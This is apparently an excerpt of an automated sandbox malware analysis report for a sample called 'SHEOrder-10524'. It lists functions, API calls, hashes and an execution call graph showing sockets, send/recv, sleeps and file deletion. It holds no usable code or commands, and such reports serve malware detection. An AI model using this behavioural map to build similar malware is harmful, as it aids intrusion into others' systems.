                                                                                                                                                                    • Instruction Fuzzy Hash: B6D05E7CA80325CEEF00ABF55480A3523D8A74474AB20C82EF119D9341D7B5C4148F51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028CE1A4 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 028CE253
                                                                                                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 028CE26F
                                                                                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 028CE2E6
                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 028CE30F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 920484758-0
                                                                                                                                                                    • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                                    • Instruction ID: 026b1d70da754b0195c9cc27814239b7c05d166be13b41037ecdbad36327a8d4
                                                                                                                                                                    • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                                    • Instruction Fuzzy Hash: B241F77DA002299FCB62EB58C890BC9B3BDAB48314F1041E9E64DE7615DB34EF808F55
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028CACF8 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 028CAD15
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028CAD39
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(028C0000,?,00000105), ref: 028CAD54
                                                                                                                                                                    • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028CADEA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3990497365-0
                                                                                                                                                                    • Opcode ID: 69a5ac93c4e62265df0e74a6020e495785402fe1a5946a40e331e3ad35518f28
                                                                                                                                                                    • Instruction ID: b36bc58d995db326696ab23378f25459a48c5715f3aa3bfb64d77b0b1386f683
                                                                                                                                                                    • Opcode Fuzzy Hash: 69a5ac93c4e62265df0e74a6020e495785402fe1a5946a40e331e3ad35518f28
                                                                                                                                                                    • Instruction Fuzzy Hash: D741627894025C9BDB21DF68CC84BDAB7FDAB08340F5040E9A648E7251D774DF848F51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028CACF6 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 028CAD15
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028CAD39
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(028C0000,?,00000105), ref: 028CAD54
                                                                                                                                                                    • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028CADEA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3990497365-0
                                                                                                                                                                    • Opcode ID: ddf3cf4d18aa6a3b9c5aa9cde9de65e5ce73ec4e6286a07cfe88fb0292dafdaa
                                                                                                                                                                    • Instruction ID: 7910ef0af3c2fc48e1076f73fb551c31b52bd0339905774889b24433766f0f66
                                                                                                                                                                    • Opcode Fuzzy Hash: ddf3cf4d18aa6a3b9c5aa9cde9de65e5ce73ec4e6286a07cfe88fb0292dafdaa
                                                                                                                                                                    • Instruction Fuzzy Hash: 3F415278A4025C9BDB21EF68CC84BDAB7FDAB08345F5040E9A648E7251DB74DF888F51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028C1C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: bc658e47605f998e16e4e6fc553286525af1e3f6901aebd177c4da42d4039346
                                                                                                                                                                    • Instruction ID: d214cc1320c7298ae3d7bb8a802799040f605ed6764572c2e2c46b9354fc1141
                                                                                                                                                                    • Opcode Fuzzy Hash: bc658e47605f998e16e4e6fc553286525af1e3f6901aebd177c4da42d4039346
                                                                                                                                                                    • Instruction Fuzzy Hash: FAA1D5AE7106004BE718AA7C9CC83BDB3C69BC4225F38827EE21DCB787DB74C9558651
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028C94A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,028C9596), ref: 028C952E
                                                                                                                                                                    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,028C9596), ref: 028C9534
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DateFormatLocaleThread
                                                                                                                                                                    • String ID: yyyy
                                                                                                                                                                    • API String ID: 3303714858-3145165042
                                                                                                                                                                    • Opcode ID: 6c9c9c245a022fa587062a042eb6f940e77b3e7893e72cddfa732d31c51d8d51
                                                                                                                                                                    • Instruction ID: 200126c5e4d769bb1012db4971ef0a197d5cea73a0f8dc9a8582035e3ecd47ae
                                                                                                                                                                    • Opcode Fuzzy Hash: 6c9c9c245a022fa587062a042eb6f940e77b3e7893e72cddfa732d31c51d8d51
                                                                                                                                                                    • Instruction Fuzzy Hash: AA21807DA012189BDB14DF68C851AFEB3B9EF48710F6140E9E909E7240E730DE44CBA6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028D9F9C Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 028D9FD0
                                                                                                                                                                    • IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 028DA000
                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000008), ref: 028DA01F
                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 028DA02B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Read$Write
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3448952669-0
                                                                                                                                                                    • Opcode ID: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
                                                                                                                                                                    • Instruction ID: b84048126ad5089c77d1d9d0192a7786dfa00359b8c194d82580222b5dfac712
                                                                                                                                                                    • Opcode Fuzzy Hash: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
                                                                                                                                                                    • Instruction Fuzzy Hash: B921D27C600219DBCB14DF69CC80BAE73A9EF88365F548519EE04D7381E734EC118BA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:5.2%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:3.7%
                                                                                                                                                                    Signature Coverage:17.1%
                                                                                                                                                                    Total number of Nodes:1917
                                                                                                                                                                    Total number of Limit Nodes:81
                                                                                                                                                                    execution_graph 52351 4165a0 52362 401e65 52351->52362 52353 4165b0 52367 4020f6 52353->52367 52356 401e65 22 API calls 52357 4165c6 52356->52357 52358 4020f6 28 API calls 52357->52358 52359 4165d1 52358->52359 52373 41292a 52359->52373 52363 401e6d 52362->52363 52364 401e75 52363->52364 52392 402158 22 API calls 52363->52392 52364->52353 52368 40210c 52367->52368 52393 4023ce 52368->52393 52370 402126 52397 402569 52370->52397 52372 402134 52372->52356 52445 40482d 52373->52445 52375 41293e 52452 4048c8 connect 52375->52452 52379 41295f 52517 402f10 52379->52517 52388 401fd8 11 API calls 52389 412991 52388->52389 52390 401fd8 11 API calls 52389->52390 52391 412999 52390->52391 52394 402428 52393->52394 52395 4023d8 52393->52395 52394->52370 52395->52394 52407 4027a7 52395->52407 52418 402888 52397->52418 52399 40257d 52400 402592 52399->52400 52401 4025a7 52399->52401 52423 402a34 22 API calls 52400->52423 52425 4028e8 52401->52425 52404 40259b 52424 4029da 22 API calls 52404->52424 52406 4025a5 52406->52372 52408 402e21 52407->52408 52411 4016b4 52408->52411 52410 402e30 52410->52394 52412 4016cb 52411->52412 52414 4016c6 52411->52414 52413 4016f3 52412->52413 52412->52414 52413->52410 52417 43bd19 11 API calls _abort 52414->52417 52416 43bd18 52417->52416 52419 402890 52418->52419 52420 402898 52419->52420 52436 402ca3 22 API calls 52419->52436 52420->52399 52423->52404 52424->52406 52426 4028f1 52425->52426 52427 402953 52426->52427 52428 4028fb 52426->52428 52443 4028a4 22 API calls 52427->52443 52431 402904 52428->52431 52434 402917 52428->52434 52437 402cae 52431->52437 52432 402915 52432->52406 52434->52432 52435 4023ce 11 API calls 52434->52435 52435->52432 52438 402cb8 __EH_prolog 52437->52438 52444 402e54 22 API calls 52438->52444 52440 402d24 52441 4023ce 11 API calls 52440->52441 52442 402d92 52441->52442 52442->52432 52444->52440 52446 404846 socket 52445->52446 52447 404839 52445->52447 52449 404860 CreateEventW 52446->52449 52450 404842 52446->52450 52558 40489e WSAStartup 52447->52558 52449->52375 52450->52375 52451 40483e 52451->52446 52451->52450 52453 404a1b 52452->52453 52454 4048ee 52452->52454 52455 40497e 52453->52455 52456 404a21 WSAGetLastError 52453->52456 52454->52455 52478 404923 52454->52478 52559 40531e 52454->52559 52512 402f31 52455->52512 52456->52455 52457 404a31 52456->52457 52459 404932 52457->52459 52460 404a36 52457->52460 52465 402093 28 API calls 52459->52465 52599 41cae1 30 API calls 52460->52599 52462 40490f 52564 402093 52462->52564 52464 40492b 52464->52459 52468 404941 52464->52468 52469 404a80 52465->52469 52467 404a40 52600 4052fd 28 API calls 52467->52600 52475 404950 52468->52475 52476 404987 52468->52476 52472 402093 28 API calls 52469->52472 52477 404a8f 52472->52477 52480 402093 28 API calls 52475->52480 52596 421a40 54 API calls 52476->52596 52481 41b4ef 80 API calls 52477->52481 52594 420c60 27 API calls 52478->52594 52486 40495f 52480->52486 52481->52455 52484 40498f 52487 4049c4 52484->52487 52488 404994 52484->52488 52490 402093 28 API calls 52486->52490 52598 420e06 28 API calls 52487->52598 52491 402093 28 API calls 52488->52491 52493 40496e 52490->52493 52495 4049a3 52491->52495 52496 41b4ef 80 API calls 52493->52496 52498 402093 28 API calls 52495->52498 52499 404973 52496->52499 52497 4049cc 52500 4049f9 CreateEventW CreateEventW 52497->52500 52502 402093 28 API calls 52497->52502 52501 4049b2 52498->52501 52595 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 52499->52595 52500->52455 52503 41b4ef 80 API calls 52501->52503 52505 4049e2 52502->52505 52507 4049b7 52503->52507 52506 402093 28 API calls 52505->52506 52508 4049f1 52506->52508 52597 4210b2 52 API calls 52507->52597 52510 41b4ef 80 API calls 52508->52510 52511 4049f6 52510->52511 52511->52500 52513 4020df 11 API calls 52512->52513 52514 402f3d 52513->52514 52515 4032a0 28 API calls 52514->52515 52516 402f59 52515->52516 52516->52379 52662 401fb0 52517->52662 52519 402f1e 52520 402055 11 API calls 52519->52520 52521 402f2d 52520->52521 52522 404aa1 52521->52522 52523 404ab4 52522->52523 52665 40520c 52523->52665 52525 404ac9 ctype 52526 404b40 WaitForSingleObject 52525->52526 52527 404b20 52525->52527 52529 404b56 52526->52529 52528 404b32 send 52527->52528 52530 404b7b 52528->52530 52671 42103a 54 API calls 52529->52671 52533 401fd8 11 API calls 52530->52533 52532 404b69 SetEvent 52532->52530 52534 404b83 52533->52534 52535 401fd8 11 API calls 52534->52535 52536 404b8b 52535->52536 52537 401fd8 52536->52537 52538 4023ce 11 API calls 52537->52538 52539 401fe1 52538->52539 52540 404c10 52539->52540 52541 4020df 11 API calls 52540->52541 52542 404c27 52541->52542 52543 4020df 11 API calls 52542->52543 52545 404c30 52543->52545 52548 404ca1 52545->52548 52552 401fd8 11 API calls 52545->52552 52689 43bd51 52545->52689 52696 404b96 52545->52696 52702 4020b7 52545->52702 52708 401fe2 52545->52708 52717 404cc3 52545->52717 52730 404e26 WaitForSingleObject 52548->52730 52552->52545 52553 401fd8 11 API calls 52554 404cb1 52553->52554 52555 401fd8 11 API calls 52554->52555 52556 404cba 52555->52556 52556->52388 52558->52451 52601 4020df 52559->52601 52561 40532a 52605 4032a0 52561->52605 52563 405346 52563->52462 52565 40209b 52564->52565 52566 4023ce 11 API calls 52565->52566 52567 4020a6 52566->52567 52609 4024ed 52567->52609 52570 41b4ef 52571 41b5a0 52570->52571 52572 41b505 GetLocalTime 52570->52572 52574 401fd8 11 API calls 52571->52574 52573 40531e 28 API calls 52572->52573 52575 41b547 52573->52575 52576 41b5a8 52574->52576 52620 406383 52575->52620 52578 401fd8 11 API calls 52576->52578 52580 41b5b0 52578->52580 52580->52478 52581 402f10 28 API calls 52582 41b55f 52581->52582 52583 406383 28 API calls 52582->52583 52584 41b56b 52583->52584 52625 407200 77 API calls 52584->52625 52586 41b579 52587 401fd8 11 API calls 52586->52587 52588 41b585 52587->52588 52589 401fd8 11 API calls 52588->52589 52590 41b58e 52589->52590 52591 401fd8 11 API calls 52590->52591 52592 41b597 52591->52592 52593 401fd8 11 API calls 52592->52593 52593->52571 52594->52464 52595->52455 52596->52484 52597->52499 52598->52497 52599->52467 52602 4020e7 52601->52602 52603 4023ce 11 API calls 52602->52603 52604 4020f2 52603->52604 52604->52561 52607 4032aa 52605->52607 52606 4032c9 52606->52563 52607->52606 52608 4028e8 28 API calls 52607->52608 52608->52606 52610 4024f9 52609->52610 52613 40250a 52610->52613 52612 4020b1 52612->52570 52614 40251a 52613->52614 52615 402520 52614->52615 52616 402535 52614->52616 52618 402569 28 API calls 52615->52618 52617 4028e8 28 API calls 52616->52617 52619 402533 52617->52619 52618->52619 52619->52612 52626 4051ef 52620->52626 52622 406391 52630 402055 52622->52630 52625->52586 52627 4051fb 52626->52627 52636 405274 52627->52636 52629 405208 52629->52622 52631 402061 52630->52631 52632 4023ce 11 API calls 52631->52632 52633 40207b 52632->52633 52658 40267a 52633->52658 52637 405282 52636->52637 52638 40529e 52637->52638 52639 405288 52637->52639 52640 4052f5 52638->52640 52641 4052b6 52638->52641 52647 4025f0 52639->52647 52656 4028a4 22 API calls 52640->52656 52645 4028e8 28 API calls 52641->52645 52646 40529c 52641->52646 52645->52646 52646->52629 52648 402888 22 API calls 52647->52648 52649 402602 52648->52649 52650 402672 52649->52650 52651 402629 52649->52651 52657 4028a4 22 API calls 52650->52657 52654 4028e8 28 API calls 52651->52654 52655 40263b 52651->52655 52654->52655 52655->52646 52659 40268b 52658->52659 52660 4023ce 11 API calls 52659->52660 52661 40208d 52660->52661 52661->52581 52663 4025f0 28 API calls 52662->52663 52664 401fbd 52663->52664 52664->52519 52666 405214 52665->52666 52667 4023ce 11 API calls 52666->52667 52668 40521f 52667->52668 52672 405234 52668->52672 52670 40522e 52670->52525 52671->52532 52673 405240 52672->52673 52674 40526e 52672->52674 52675 4028e8 28 API calls 52673->52675 52688 4028a4 22 API calls 52674->52688 52677 40524a 52675->52677 52677->52670 52694 446137 ___crtLCMapStringA 52689->52694 52690 446175 52744 4405dd 20 API calls _abort 52690->52744 52692 446160 RtlAllocateHeap 52693 446173 52692->52693 52692->52694 52693->52545 52694->52690 52694->52692 52743 442f80 7 API calls 2 library calls 52694->52743 52697 404ba0 WaitForSingleObject 52696->52697 52698 404bcd recv 52696->52698 52745 421076 54 API calls 52697->52745 52700 404be0 52698->52700 52700->52545 52701 404bbc SetEvent 52701->52700 52703 4020bf 52702->52703 52704 4023ce 11 API calls 52703->52704 52705 4020ca 52704->52705 52706 40250a 28 API calls 52705->52706 52707 4020d9 52706->52707 52707->52545 52709 401ff1 52708->52709 52716 402039 52708->52716 52710 4023ce 11 API calls 52709->52710 52711 401ffa 52710->52711 52712 40203c 52711->52712 52713 402015 52711->52713 52714 40267a 11 API calls 52712->52714 52746 403098 28 API calls 52713->52746 52714->52716 52716->52545 52718 4020df 11 API calls 52717->52718 52728 404cde 52718->52728 52719 404e13 52720 401fd8 11 API calls 52719->52720 52721 404e1c 52720->52721 52721->52545 52722 4041a2 28 API calls 52722->52728 52723 401fe2 28 API calls 52723->52728 52724 401fd8 11 API calls 52724->52728 52726 4020f6 28 API calls 52726->52728 52728->52719 52728->52722 52728->52723 52728->52724 52728->52726 52747 41299f 52728->52747 52791 401fc0 52728->52791 52731 404e40 SetEvent FindCloseChangeNotification 52730->52731 52732 404e57 closesocket 52730->52732 52733 404ca8 52731->52733 52734 404e64 52732->52734 52733->52553 52735 404e7a 52734->52735 53330 4050e4 84 API calls 52734->53330 52737 404e8c WaitForSingleObject 52735->52737 52738 404ece SetEvent CloseHandle 52735->52738 53331 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 52737->53331 52738->52733 52740 404e9b SetEvent WaitForSingleObject 53332 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 52740->53332 52742 404eb3 SetEvent CloseHandle CloseHandle 52742->52738 52743->52694 52744->52693 52745->52701 52746->52716 52748 4129b1 52747->52748 52795 4041a2 52748->52795 52751 4020f6 28 API calls 52752 4129d3 52751->52752 52753 4020f6 28 API calls 52752->52753 52754 4129e2 52753->52754 52798 41be1b 52754->52798 52757 412a93 52967 401e8d 52757->52967 52759 401e65 22 API calls 52761 412a02 52759->52761 52763 4020f6 28 API calls 52761->52763 52762 401fd8 11 API calls 52765 412aa5 52762->52765 52764 412a0d 52763->52764 52766 401e65 22 API calls 52764->52766 52767 401fd8 11 API calls 52765->52767 52768 412a18 52766->52768 52769 412aad 52767->52769 52770 4020f6 28 API calls 52768->52770 52769->52728 52771 412a23 52770->52771 52772 401e65 22 API calls 52771->52772 52773 412a2e 52772->52773 52774 4020f6 28 API calls 52773->52774 52775 412a39 52774->52775 52776 401e65 22 API calls 52775->52776 52777 412a44 52776->52777 52778 4020f6 28 API calls 52777->52778 52779 412a4f 52778->52779 52780 401e65 22 API calls 52779->52780 52781 412a5a 52780->52781 52782 4020f6 28 API calls 52781->52782 52783 412a65 52782->52783 52784 401e65 22 API calls 52783->52784 52785 412a73 52784->52785 52786 4020f6 28 API calls 52785->52786 52787 412a7e 52786->52787 52820 412ab4 GetModuleFileNameW 52787->52820 52790 404e26 99 API calls 52790->52757 52792 401fd2 CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 52791->52792 52793 401fc9 52791->52793 52792->52728 53189 415aea 52792->53189 53188 4025e0 28 API calls 52793->53188 52973 40423a 52795->52973 52799 4020df 11 API calls 52798->52799 52819 41be2e 52799->52819 52800 41be9e 52801 401fd8 11 API calls 52800->52801 52802 41bed0 52801->52802 52804 401fd8 11 API calls 52802->52804 52803 41bea0 52805 4041a2 28 API calls 52803->52805 52807 41bed8 52804->52807 52808 41beac 52805->52808 52806 4041a2 28 API calls 52806->52819 52809 401fd8 11 API calls 52807->52809 52810 401fe2 28 API calls 52808->52810 52812 4129eb 52809->52812 52813 41beb5 52810->52813 52811 401fe2 28 API calls 52811->52819 52812->52757 52812->52759 52814 401fd8 11 API calls 52813->52814 52816 41bebd 52814->52816 52815 401fd8 11 API calls 52815->52819 52980 41ce34 28 API calls 52816->52980 52819->52800 52819->52803 52819->52806 52819->52811 52819->52815 52979 41ce34 28 API calls 52819->52979 52821 4020df 11 API calls 52820->52821 52822 412adf 52821->52822 52823 4020df 11 API calls 52822->52823 52824 412aeb 52823->52824 52825 4020df 11 API calls 52824->52825 52846 412af7 52825->52846 52826 41b978 43 API calls 52826->52846 52827 40d9e8 32 API calls 52827->52846 52828 401fd8 11 API calls 52828->52846 52829 40417e 28 API calls 52829->52846 52830 4042fc 79 API calls 52830->52846 52831 40431d 28 API calls 52831->52846 52832 403014 28 API calls 52832->52846 52833 412c1d Sleep 52833->52846 52834 418568 31 API calls 52834->52846 52835 412cbf Sleep 52835->52846 52836 401f09 11 API calls 52836->52846 52837 412d61 Sleep 52837->52846 52838 412dc4 DeleteFileW 52838->52846 52839 41c485 32 API calls 52839->52846 52840 412dfb DeleteFileW 52840->52846 52841 412e4d Sleep 52841->52846 52842 412e37 DeleteFileW 52842->52846 52843 412ec6 52844 401f09 11 API calls 52843->52844 52845 412ed2 52844->52845 52847 401f09 11 API calls 52845->52847 52846->52826 52846->52827 52846->52828 52846->52829 52846->52830 52846->52831 52846->52832 52846->52833 52846->52834 52846->52835 52846->52836 52846->52837 52846->52838 52846->52839 52846->52840 52846->52841 52846->52842 52846->52843 52851 412e92 Sleep 52846->52851 52848 412ede 52847->52848 52849 401f09 11 API calls 52848->52849 52850 412eea 52849->52850 52981 40b904 52850->52981 52999 401f09 52851->52999 52854 412efd 52856 4020f6 28 API calls 52854->52856 52855 401f09 11 API calls 52858 412ea2 52855->52858 52857 412f1d 52856->52857 52987 41322d 52857->52987 52858->52846 52858->52855 52860 412ec4 52858->52860 52860->52850 52862 401f09 11 API calls 52863 412f34 52862->52863 52864 412f54 52863->52864 52865 4130a8 52863->52865 53002 41bd1e 52864->53002 52867 41bd1e 28 API calls 52865->52867 52868 4130b1 52867->52868 52870 402f31 28 API calls 52868->52870 52872 4130e8 52870->52872 52874 402f10 28 API calls 52872->52874 52876 4130f7 52874->52876 52875 402f31 28 API calls 52877 412faa 52875->52877 52878 402f10 28 API calls 52876->52878 52879 402f10 28 API calls 52877->52879 52880 413103 52878->52880 52881 412fb9 52879->52881 52882 402f10 28 API calls 52880->52882 52883 402f10 28 API calls 52881->52883 52884 413112 52882->52884 52885 412fc8 52883->52885 52886 402f10 28 API calls 52884->52886 52887 402f10 28 API calls 52885->52887 52888 413121 52886->52888 52889 412fd7 52887->52889 52890 402f10 28 API calls 52888->52890 52891 402f10 28 API calls 52889->52891 52892 413130 52890->52892 52893 412fe6 52891->52893 52894 402f10 28 API calls 52892->52894 52895 402f10 28 API calls 52893->52895 52896 41313f 52894->52896 52897 412ff2 52895->52897 52899 402ea1 28 API calls 52896->52899 52898 402f10 28 API calls 52897->52898 52901 412ffe 52898->52901 52900 413149 52899->52900 52902 404aa1 61 API calls 52900->52902 53011 402ea1 52901->53011 52904 413156 52902->52904 52906 401fd8 11 API calls 52904->52906 52908 413162 52906->52908 52907 402f10 28 API calls 52909 413019 52907->52909 52910 401fd8 11 API calls 52908->52910 52911 402ea1 28 API calls 52909->52911 52912 41316e 52910->52912 52913 413023 52911->52913 52914 401fd8 11 API calls 52912->52914 52915 404aa1 61 API calls 52913->52915 52916 41317a 52914->52916 52917 413030 52915->52917 52918 401fd8 11 API calls 52916->52918 52919 401fd8 11 API calls 52917->52919 52920 413186 52918->52920 52921 413039 52919->52921 52922 401fd8 11 API calls 52920->52922 52923 401fd8 11 API calls 52921->52923 52924 41318f 52922->52924 52925 413042 52923->52925 52926 401fd8 11 API calls 52924->52926 52927 401fd8 11 API calls 52925->52927 52928 413198 52926->52928 52929 41304b 52927->52929 52931 401fd8 11 API calls 52928->52931 52930 401fd8 11 API calls 52929->52930 52932 413054 52930->52932 52955 41309c 52931->52955 52933 401fd8 11 API calls 52932->52933 52935 413060 52933->52935 52934 401fd8 11 API calls 52936 4131aa 52934->52936 52937 401fd8 11 API calls 52935->52937 52938 401f09 11 API calls 52936->52938 52939 41306c 52937->52939 52940 4131b6 52938->52940 52941 401fd8 11 API calls 52939->52941 52942 401fd8 11 API calls 52940->52942 52943 413078 52941->52943 52944 4131c2 52942->52944 52945 401fd8 11 API calls 52943->52945 52946 401fd8 11 API calls 52944->52946 52947 413084 52945->52947 52948 4131ce 52946->52948 52949 401fd8 11 API calls 52947->52949 52950 401fd8 11 API calls 52948->52950 52951 413090 52949->52951 52952 4131da 52950->52952 52953 401fd8 11 API calls 52951->52953 52954 401fd8 11 API calls 52952->52954 52953->52955 52956 4131e6 52954->52956 52955->52934 52957 401fd8 11 API calls 52956->52957 52958 4131f2 52957->52958 52959 401fd8 11 API calls 52958->52959 52960 4131fe 52959->52960 52961 401fd8 11 API calls 52960->52961 52962 41320a 52961->52962 52963 401fd8 11 API calls 52962->52963 52964 413216 52963->52964 52965 401fd8 11 API calls 52964->52965 52966 412a83 52965->52966 52966->52790 52968 402163 52967->52968 52972 40219f 52968->52972 53186 402730 11 API calls 52968->53186 52970 402184 53187 402712 11 API calls std::_Deallocate 52970->53187 52972->52762 52974 404243 52973->52974 52975 4023ce 11 API calls 52974->52975 52976 40424e 52975->52976 52977 402569 28 API calls 52976->52977 52978 4041b5 52977->52978 52978->52751 52979->52819 52980->52800 52982 40b90c 52981->52982 53020 402252 52982->53020 52984 40b917 53024 40b92c 52984->53024 52986 40b926 52986->52854 52988 41326b 52987->52988 52990 41323c 52987->52990 52989 41327a 52988->52989 53046 274c1c5b 52988->53046 53054 40417e 52989->53054 53050 411cf2 52990->53050 52995 401fd8 11 API calls 52997 412f28 52995->52997 52997->52862 53000 402252 11 API calls 52999->53000 53001 401f12 53000->53001 53001->52858 53003 41bd2b 53002->53003 53004 4020b7 28 API calls 53003->53004 53005 412f60 